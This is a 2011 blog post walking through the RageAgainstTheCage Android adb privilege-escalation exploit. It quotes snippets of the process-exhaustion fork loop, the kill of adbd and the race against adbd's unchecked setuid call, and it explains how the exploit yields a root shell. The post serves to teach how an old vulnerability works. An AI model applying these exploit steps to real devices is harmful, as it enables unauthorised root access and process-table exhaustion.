RSS Feed

RageAgainstTheCage

Posted on March 24, 2011 by thesnkchrmr

This post gives a detailed explanation of the RageAgainstTheCage (RATC) exploit
Also commonly known as the “adb setuid exhaustion attack” and CVE-2010-EASY 😉

getrlimit(RLIMIT_NPROC, &rl)

If a process tries to perform a fork and the user that owns that process already owns RLIMIT_NPROC processes, then the fork fails.

adb_pid = find_adb();

This function merely finds the adbdaemon’s pid

Now RATC spawns RLIMIT_NPROC number of stub processes 

	if (fork() == 0) {
		close(pepe[0]);
		for (;;) {
			if ((p = fork()) == 0) {
				exit(0);
			} else if (p < 0) {
				if (new_pids) {
					printf("\n[+] Forked %d childs.\n", pids);
					new_pids = 0;
					write(pepe[1], &c, 1);
					close(pepe[1]);
				}
			} else {
				++pids;
			}
		}
	}

Now RATC kills the adb daemon using the pid it had collected earlier

kill(adb_pid, 9);

Note that there are RLIMIT_NPROC - 1 processes currently active in the system under the ownership of RATC

Detecting the death of adbd, adb restarts it. When adb is restarted, it has multiple tasks to accomplish for which it has to run as the root user. The details of which are not crystal clear to me at the moment.

Once these tasks are accomplished, it lowers its privileges to AID_SHELL by running

        setgid(AID_SHELL);
        setuid(AID_SHELL);

RATC spawns another process at the same time

	if (fork() == 0) {
		fork();
		for (;;)
			sleep(0x743C);
	}

This is a race condition between RATC and the adb-server, as to which of the two would get to spawn that last process and hit the NPROC_RLIMIT limit, thereby preventing the other from successfully executing.
In case RATC wins the race and successfully spawns a stub process, NPROC_RLIMIT would be reached and adb’s attempt to setuid(AID_SHELL) would fail and it will continue to run as root.
The flaw here is that, the return condition of the setuid() is not checked. All the user needs to do now is to spawn a shell from adb and the parent’s privileges would be transferred to the shell which would run as root.

In case, adb wins the race and is able to setuid() successfully, then the fork() in RATC fails and so does the user’s attempt to gain root access. All the user can do is to redo this entire method yet again.

This is by far, the most easily-understood exploit I have seen till now.
All credits to Sebastian Krahmer, The Intrepidus Group and !g
You can check the adb.c source here
Sebastian has published his code under GPL
The complete RageAgainstTheCage code

Advertisements

2 Comments

Posted in Android and tagged , , , , , . Bookmark the permalink.

2 responses »

  1. Rishabh Dangwal | April 17, 2011 at 4:01 pm

    very nice and excellent explaination of the exploit. can I repost it on my website to your credit?

    stay gold..

    Reply

Leave a Reply

Fill in your details below or click an icon to log in:

Gravatar
WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Cancel

Connecting to %s

%d bloggers like this: